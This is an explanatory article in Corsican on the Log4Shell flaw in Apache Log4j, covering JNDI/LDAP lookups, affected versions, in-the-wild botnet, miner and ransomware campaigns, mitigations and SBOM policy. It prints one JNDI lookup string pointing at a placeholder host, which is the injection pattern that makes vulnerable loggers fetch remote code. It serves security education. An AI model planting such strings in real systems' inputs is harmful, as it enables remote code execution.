Table di cuntinutu[Piattà][Mostra]
À a fini di nuvembre 2021, avemu scupertu una minaccia maiò per a cibersigurtà. Stu sfruttamentu puderia influenzà milioni di sistemi di computer in u mondu.
Questa hè una guida nantu à a vulnerabilità Log4j è cumu un difettu di design trascuratu hà lasciatu più di 90% di i servizii di l'informatica di u mondu aperti à l'attaccu.
Apache Log4j hè una utilità di logging open-source basata in Java sviluppata da Apache Software Foundation. Originariamente scrittu da Ceki Gülcü in u 2001, hè issa parte di Apache Logging Services, un prughjettu di l'Apache Software Foundation.
L'imprese in u mondu utilizanu a biblioteca Log4j per attivà u logu in e so applicazioni. In fatti, a biblioteca Java hè cusì omnipresente, pudete truvà in applicazioni da Amazon, Microsoft, Google, è più.
A prominenza di a biblioteca significa chì ogni difettu potenziale in u codice puderia lascià milioni di computer aperti à u pirate. U 24 di nuvembre di u 2021, a sicurità in nuvola un ricercatore chì travaglia per Alibaba hà scupertu un difettu terribili.
A vulnerabilità Log4j, cunnisciuta ancu cum'è Log4Shell, esistia inosservata da u 2013. A vulnerabilità hà permessu à l'attori maliziusi di eseguisce codice nantu à i sistemi affettati chì currenu Log4j. Hè statu divulgatu publicamente u 9 di dicembre di u 2021
L'esperti di l'industria chjamanu u difettu Log4Shell a più grande vulnerabilità in a memoria recente.
In a settimana dopu a publicazione di a vulnerabilità, i squadre di cibersecurità anu rilevatu milioni di attacchi. Certi circadori anu osservatu ancu una rata di più di centu attacchi per minutu.
Cumu viaghja?
Per capisce perchè Log4Shell hè cusì periculosu, avemu bisognu di capisce ciò chì hè capace.
A vulnerabilità Log4Shell permette l'esekzione di codice arbitrariu, chì basicamente significa chì un attaccu pò eseguisce qualsiasi cumandamentu o codice in una macchina di destinazione.
Cumu fà questu?
Prima, avemu bisognu di capisce ciò chì hè u JNDI.
U Java Naming and Directory Interface (JNDI) hè un serviziu Java chì permette à i prugrammi Java di scopre è cercà dati è risorse via un nome. Questi servizii di repertoriu sò impurtanti perchè furniscenu un inseme organizzatu di registri per i sviluppatori per fà facilmente riferimentu quandu creanu applicazioni.
U JNDI pò utilizà diversi protokolli per accede à un certu repertoriu. Unu di sti protokolli hè u Protokollu Lightweight Directory Access, o LDAP.
Quandu si registra una stringa, log4j esegue sustituzzioni di stringa quandu scontranu espressioni di a forma ${prefix:name}
.
Per esempiu, Text: ${java:version}
puderia esse registratu cum'è Testu: versione Java 1.8.0_65. Stu tipu di sustituzzioni sò cumuni.
Pudemu ancu avè espressioni cum'è Text: ${jndi:ldap://example.com/file}
chì usa u sistema JNDI per carricà un ughjettu Java da un URL attraversu u protocolu LDAP.
Questu carica in modu efficace i dati chì venenu da quellu URL in a macchina. Ogni putenziale pirate pò accoglie codice maliziusu in un URL publicu è aspittà chì e macchine chì utilizanu Log4j per logu.
Siccomu i cuntenuti di i missaghji di logu cuntenenu dati cuntrullati da l'utilizatori, i pirate ponu inserisce e so referenze JNDI chì puntanu à i servitori LDAP chì cuntrullanu. Questi servitori LDAP ponu esse pieni di oggetti Java maliziusi chì u JNDI pò eseguisce attraversu a vulnerabilità.
Ciò chì peghju hè chì ùn importa micca se l'applicazione hè una applicazione di u servitore o di u cliente.
Sempre chì ci hè un modu per u logger per leghje u codice maliziusu di l'attaccante, l'applicazione hè sempre aperta à sfruttamenti.
Quale hè affettatu?
A vulnerabilità afecta à tutti i sistemi è servizii chì utilizanu APache Log4j, cù e versioni 2.0 finu à 2.14.1.
Diversi esperti di sicurezza cunsiglianu chì a vulnerabilità pò avè un impattu in una quantità di applicazioni chì utilizanu Java.
U difettu hè statu scupertu prima in u video game Minecraft di Microsoft. Microsoft hà urdinatu à i so utilizatori à aghjurnà u so software Minecraft in edizione Java per prevene ogni risicu.
Jen Easterly, u Direttore di l'Agenzia di Sicurezza Cibernetica è Infrastruttura (CISA) dice chì i venditori anu un rispunsabilità maiò per impedisce l'utilizatori finali da attori maliziusi chì sfruttanu sta vulnerabilità.
"I venditori duveranu ancu cumunicà cù i so clienti per assicurà chì l'utilizatori finali sanu chì u so pruduttu cuntene questa vulnerabilità è deve priorizà l'aghjurnamenti di u software".
L'attacchi sò digià iniziati. Symantec, una sucità chì furnisce software di cibersecurità, hà osservatu un numeru variatu di richieste di attaccu.
Eccu alcuni esempi di i tipi di attacchi chì i circadori anu rilevatu:
- botnets
Botnets sò una reta di computer chì sò sottu à u cuntrollu di una sola partita attaccante. Aiutanu à realizà attacchi DDoS, arrubbanu dati è altre scams. I ricercatori anu osservatu a botnet Muhstik in scripts di shell scaricati da u sfruttamentu Log4j.
- Trojan XMRig Miner
XMRig hè un minatore di criptocurrency open-source chì usa CPU per minà u token Monero. I cibercriminali ponu installà XMRig in i dispositi di e persone per pudè utilizà a so putenza di trasfurmazioni senza a so cunniscenza.
- Khonsari Ransomware
Ransomware si riferisce à una forma di malware cuncepitu per cripta i schedari nant'à un urdinatore. L'attaccanti ponu esse dumandà u pagamentu in cambiu di dà accessu à i schedarii criptati. I ricercatori anu scupertu u ransomware Khonsari in attacchi Log4Shell. Sò destinati à i servitori di Windows è facenu usu di u framework .NET.
Chì ghjè successu?
I sperti predicenu chì pò piglià mesi o forse ancu anni per risolve cumplettamente u caosu purtatu da a vulnerabilità Log4J.
Stu prucessu implica l'aghjurnamentu di ogni sistema affettatu cù una versione patched. Ancu s'è tutti sti sistemi sò patched, ci hè sempre a minaccia imminente di pussibuli backdoors chì i pirate anu digià aghjuntu à a finestra chì i servitori eranu aperti per l'attaccu.
parechje soluzioni e mitigazioni esiste per impedisce l'applicazioni da esse sfruttate da stu bug. A nova versione di Log4j 2.15.0-rc1 hà cambiatu diverse paràmetri per mitigà sta vulnerabilità.
Tutte e funzioni chì utilizanu JNDI seranu disattivate per difettu è e ricerche remote sò state ancu limitate. A disattivazione di a funzione di ricerca in a vostra cunfigurazione Log4j aiuterà à diminuisce u risicu di pussibuli sfruttamenti.
Fora di Log4j, ci hè sempre a necessità di un pianu più largu per prevene sfruttamenti open-source.
A principiu di maghju, a Casa Bianca hà liberatu un ordini esecutivi chì hà u scopu di migliurà a cibersigurtà naziunale. Includeva una disposizione per una fattura di materiale di software (SBOM) chì era essenzialmente un documentu formale chì cuntene una lista di ogni articulu necessariu per custruisce l'applicazione.
Stu include parti cum'è u fonti apertu pacchetti, dipendenze è API utilizati per u sviluppu. Ancu se l'idea di SBOM sò utili per a trasparenza, aiuterà veramente u cunsumadore?
L'aghjurnamentu di e dipendenze pò esse troppu fastidiu. L'imprese ponu solu sceglie di pagà qualsiasi fine piuttostu chè risicate di perde u tempu extra à truvà pacchetti alternativi. Forsi questi SBOM seranu utili solu se u so scopre hè limitatu in più.
cunchiusioni
U prublema Log4j hè più cà solu un prublema tecnicu per l'urganisazione.
I dirigenti di l'imprese deve esse cuscenti di i risichi putenziali chì ponu accade quandu i so servitori, prudutti o servizii s'appoghjanu in codice chì elli stessi ùn mantenenu micca.
A basa di l'applicazioni open-source è di terze parti vene sempre cun una certa quantità di risicu. L'imprese anu da cunsiderà l'elaborazione di strategie di mitigazione di risichi prima chì e novi minacce venenu à a luce.
Gran parte di u web si basa in un software open-source mantinutu da millaie di vuluntarii in u mondu.
Se vulemu mantene u web in un locu sicuru, i guverni è e corporazioni duveranu investisce in u finanziamentu di i sforzi open source è l'agenzii di cibersecurità cum'è CISA.
Lascia un Audiolibro